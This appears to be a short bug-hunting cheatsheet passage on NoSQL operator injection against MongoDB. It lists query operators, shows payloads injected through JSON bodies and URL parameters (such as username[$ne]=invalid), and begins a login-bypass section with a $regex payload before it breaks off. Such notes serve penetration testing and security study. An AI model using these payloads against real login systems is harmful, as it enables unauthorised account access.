cyb0rg71/Bug-Hunting-Cheatsheet/NoSQLi.md

 # NoSQL operator injection
 ```
 $where - Matches documents that satisfy a JavaScript expression.
 $ne - Matches all values that are not equal to a specified value.
 $in - Matches all of the values specified in an array.
 $regex - Selects documents where values match a specified regular expression.
 ```
 ## Submitting query operators
 In JSON messages, you can insert query operators as nested objects.
 For example, ```{"username":"wiener"}``` becomes ```{"username":{"$ne":"invalid"}}```.

 For URL-based inputs, you can insert query operators via URL parameters.
 For example, username=wiener becomes ```username[$ne]=invalid```.
-If this doesn't work, you can try the following:

-    1. Convert the request method from GET to POST.
-    2. Change the Content-Type header to application/json.
-    3. Add JSON to the message body.
-    4. Inject query operators in the JSON.
 # MongoDB Login Bypass
 ```
 {"$regex":"wien.*"} >> For username